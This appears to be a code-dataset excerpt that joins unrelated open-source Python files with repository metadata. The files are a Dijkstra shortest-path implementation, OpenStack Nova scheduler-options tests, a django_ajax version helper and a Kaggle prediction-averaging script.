'order': 'title',
'from': 'today',
'to': 'tomorrow'},
'00000000-0000-0000-0000-000000000000',
'00000000-0000-0000-0000-000000000000',
_timestamp=1234)
        # Are we at least accessing the correct base URL?
self.assert_(signed_Indico_request_url.startswith("https://indico.cern.ch/export/
|
ddeepak6992/Algorithms
|
Graph/Dijkstra.py
|
Python
|
gpl-2.0
| 935 | 0.019251 |
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 17 19:41:46 2015
@author: deep
"""
from graph import weightedGraph
import heapq
def djikstra(a, S):
    """Single-source shortest paths from S via Dijkstra's algorithm with a binary heap."""
    N = len(a.adjLst)
    Visited = [False for i in xrange(N)]
    Distance = [float('inf') for i in xrange(N)]
    Distance[S] = 0
    heap = []
    heapq.heappush(heap, (0, S))
    while heap:
        _, u = heapq.heappop(heap)
        if Visited[u]:
            continue  # stale heap entry; u was already settled by a shorter path
        Visited[u] = True
        for weight_uv, v in a.adjLst[u]:
            if not Visited[v] and Distance[v] > Distance[u] + weight_uv:
                Distance[v] = Distance[u] + weight_uv
                heapq.heappush(heap, (Distance[v], v))
    print Distance
    return Distance
g = weightedGraph(4)
g.addEdge(0,1,1)
g.addEdge(1,2,2)
g.addEdge(2,3,3)
g.addEdge(3,0,4)
djikstra(g,0)
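# If weightedGraph stores undirected edges (an assumption; its definition is
# not shown in this file), the call above prints [0, 1, 3, 4].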
|
Brocade-OpenSource/OpenStack-DNRM-Nova
|
nova/tests/scheduler/test_scheduler_options.py
|
Python
|
apache-2.0
| 5,241 | 0.001145 |
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests For PickledScheduler.
"""
import datetime
import StringIO
from nova.openstack.common import jsonutils
from nova.scheduler import scheduler_options
from nova import test
class FakeSchedulerOptions(scheduler_options.SchedulerOptions):
def __init__(self, last_checked, now, file_old, file_now, data, filedata):
super(FakeSchedulerOptions, self).__init__()
# Change internals ...
self.last_modified = file_old
self.last_checked = last_checked
self.data = data
# For overrides ...
self._time_now = now
self._file_now = file_now
self._file_data = filedata
self.file_was_loaded = False
def _get_file_timestamp(self, filename):
return self._file_now
def _get_file_handle(self, filename):
self.file_was_loaded = True
return StringIO.StringIO(self._file_data)
def _get_time_now(self):
return self._time_now
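# The fake above pins both the clock and the file mtime, letting the cases
# below probe SchedulerOptions' reload policy (as inferred from the tests):
# the JSON file is re-read only when a filename is supplied, enough time has
# passed since last_checked, and the file timestamp is newer than the cache.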
class SchedulerOptionsTestCase(test.NoDBTestCase):
def test_get_configuration_first_time_no_flag(self):
last_checked = None
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = None
file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
data = dict(a=1, b=2, c=3)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
{}, jdata)
self.assertEquals({}, fake.get_configuration())
self.assertFalse(fake.file_was_loaded)
def test_get_configuration_first_time_empty_file(self):
last_checked = None
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = None
file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
jdata = ""
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
{}, jdata)
self.assertEquals({}, fake.get_configuration('foo.json'))
self.assertTrue(fake.file_was_loaded)
def test_get_configuration_first_time_happy_day(self):
last_checked = None
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = None
file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
data = dict(a=1, b=2, c=3)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
{}, jdata)
self.assertEquals(data, fake.get_configuration('foo.json'))
self.assertTrue(fake.file_was_loaded)
def test_get_configuration_second_time_no_change(self):
last_checked = datetime.datetime(2011, 1, 1, 1, 1, 1)
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
data = dict(a=1, b=2, c=3)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
data, jdata)
self.assertEquals(data, fake.get_configuration('foo.json'))
self.assertFalse(fake.file_was_loaded)
def test_get_configuration_second_time_too_fast(self):
last_checked = datetime.datetime(2011, 1, 1, 1, 1, 1)
now = datetime.datetime(2011, 1, 1, 1, 1, 2)
file_old = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_now = datetime.datetime(2013, 1, 1, 1, 1, 1)
old_data = dict(a=1, b=2, c=3)
data = dict(a=11, b=12, c=13)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
old_data, jdata)
self.assertEquals(old_data, fake.get_configuration('foo.json'))
self.assertFalse(fake.file_was_loaded)
def test_get_configuration_second_time_change(self):
last_checked = datetime.datetime(2011, 1, 1, 1, 1, 1)
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = datetime.datetime(2012, 1, 1, 1, 1, 1)
        file_now = datetime.datetime(2013, 1, 1, 1, 1, 1)
old_data = dict(a=1, b=2, c=3)
data = dict(a=11, b=12, c=13)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
old_data, jdata)
        self.assertEquals(data, fake.get_configuration('foo.json'))
self.assertTrue(fake.file_was_loaded)
|
RyanNoelk/ClanLadder
|
django_ajax/__init__.py
|
Python
|
mit
| 1,900 | 0 |
"""
Init
"""
from __future__ import unicode_literals
import datetime
import os
import subprocess
VERSION = (2, 2, 13, 'final', 0)
def get_version(version=None):
"""
Returns a PEP 386-compliant version number from VERSION.
"""
if not version:
version = VERSION
else:
assert len(version) == 5
assert version[3] in ('alpha', 'beta', 'rc', 'final')
# Now build the two parts of the version number:
# main = X.Y[.Z]
# sub = .devN - for pre-alpha releases
# | {a|b|c}N - for alpha, beta and rc releases
parts = 2 if version[2] == 0 else 3
main = '.'.join(str(x) for x in version[:parts])
sub = ''
if version[3] == 'alpha' and version[4] == 0:
git_changeset = get_git_changeset()
if git_changeset:
sub = '.dev%s' % git_changeset
elif version[3] != 'final':
mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}
        sub = mapping[version[3]] + str(version[4])
return str(main + sub)
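# Illustrative results, computed from the scheme above (not from upstream docs):
#   get_version((2, 2, 13, 'final', 0))  -> '2.2.13'
#   get_version((2, 3, 0, 'beta', 1))    -> '2.3b1'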
def get_git_changeset():
"""
Returns a numeric identifier of the latest git changeset.
The result is the UTC timestamp of the changeset in YYYYMMDDHHMMSS format.
This value isn't guaranteed to be unique, but collisions are very unlikely,
    so it's sufficient for generating the development version numbers.
"""
repo_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
git_log = subprocess.Popen('git log --pretty=format:%ct --quiet -1 HEAD',
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=True, cwd=repo_dir,
universal_newlines=True)
timestamp = git_log.communicate()[0]
try:
timestamp = datetime.datetime.utcfromtimestamp(int(timestamp))
except ValueError:
return None
return timestamp.strftime('%Y%m%d%H%M%S')
|
ldamewood/kaggle
|
facebook/combine.py
|
Python
|
mit
| 1,058 | 0.005671 |
# -*- coding: utf-8 -*-
import pandas as pd
from itertools import izip
import numpy as np
import glob
from facebook import FacebookCompetition
print('Loading test data')
bids = pd.read_csv(FacebookCompetition.__data__['bids'])
test = pd.read_csv(FacebookCompetition.__data__['test'])
te = pd.merge(test, bids, how='left')
del bids
files = glob.glob('data/facebook.te.*.txt.gz')
its = [iter(pd.read_table(f, header=-1, iterator=True, chunksize=2**15, compression='gzip')) for f in files]
#with open('data/facebook_softmax_20150506.csv', 'w') as out:
c = []
for i,chunks in enumerate(izip(*its)):
print(i)
A = np.array([np.c_[chunk.values,1-chunk.values] for chunk in chunks])
A = np.exp(np.log(A).mean(axis=0))
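    # np.exp(np.log(A).mean(axis=0)) takes the geometric mean of the
    # per-model class probabilities; the row normalization below rescales
    # each pair of columns to sum to 1 again.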
    A /= A.sum(axis=1)[:, np.newaxis]
A = A[:,0]
df = pd.DataFrame(A)
df.index = chunks[0].index
df.columns = chunks[0].columns
c.append(df)
df = pd.concat(c)
df.index = te.bidder_id
df = df.groupby(level=0).mean()
df.columns = ['prediction']
df.to_csv('data/facebook.te.20150509_1.csv', index_label='bidder_id')
|